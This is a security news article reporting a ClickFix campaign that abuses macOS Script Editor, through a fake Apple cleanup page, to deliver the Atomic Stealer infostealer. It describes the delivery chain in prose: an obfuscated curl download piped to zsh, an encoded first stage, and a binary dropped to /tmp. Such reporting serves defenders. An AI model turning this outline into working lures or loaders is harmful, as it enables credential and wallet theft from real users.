New ClickFix Campaign Exploits macOS Script Editor to Deploy Atomic Stealer
A newly identified ClickFix campaign is actively targeting macOS users by leveraging the Script Editor application to deliver the Atomic Stealer malware. This method circumvents traditional security measures, highlighting the evolving nature of cyber threats against Apple devices.
Understanding ClickFix Attacks
ClickFix is a social engineering technique where attackers deceive users into executing malicious commands on their systems. Historically, this involved instructing users to paste commands into the Terminal application. However, with the release of macOS 26.4, Apple introduced security features that scan commands pasted into Terminal, adding friction to this attack vector. In response, cybercriminals have adapted by utilizing the Script Editor, a built-in macOS application that supports AppleScript automation.
The Attack Mechanism
The campaign begins with a deceptive webpage designed to resemble legitimate Apple maintenance tools. This page presents itself as a disk space cleanup utility, providing step-by-step instructions that mimic authentic macOS guidance.
When the user clicks the Execute button on this fake webpage, the browser triggers the `applescript` URL scheme. This action prompts the browser to open the Script Editor, displaying a pre-populated script that appears to be an Apple storage optimization utility. The script includes fake copyright headers to enhance its credibility.
Execution and Payload Delivery
Upon running the script, the attack chain is initiated. The embedded command is obfuscated using the `tr` utility, which translates a scrambled string into a functional URL at runtime. This URL employs `curl` with the `-k` flag to disable TLS certificate validation, allowing the malware to connect to untrusted servers without raising alarms. The downloaded content is then piped directly into `zsh` and executed in memory, avoiding detection by traditional security tools.
The first-stage payload is encoded using base64 and compressed with gzip to conceal its contents. Once decoded, it retrieves a Mach-O binary, saves it to `/tmp/helper`, removes extended attributes, assigns execution permissions, and runs it. This binary is a variant of the Atomic Stealer, a notorious macOS infostealer that targets browser credentials, saved passwords, cryptocurrency wallets, and other sensitive data.
Implications and Recommendations
This campaign underscores the adaptability of cybercriminals in response to enhanced security measures. By shifting from Terminal to Script Editor, attackers exploit less scrutinized pathways to compromise systems.
To mitigate such threats, users should:
– Exercise Caution with Unsolicited Prompts: Be wary of unexpected prompts to execute scripts or commands, especially from unverified sources.
– Verify the Authenticity of Maintenance Tools: Ensure that any system maintenance tools or utilities are obtained directly from official Apple resources or trusted developers.
– Keep Software Updated: Regularly update macOS and all installed applications to benefit from the latest security patches.
– Utilize Comprehensive Security Solutions: Employ reputable security software that can detect and prevent such sophisticated attacks.
By staying informed and adopting proactive security practices, users can better protect themselves against evolving cyber threats targeting macOS systems.
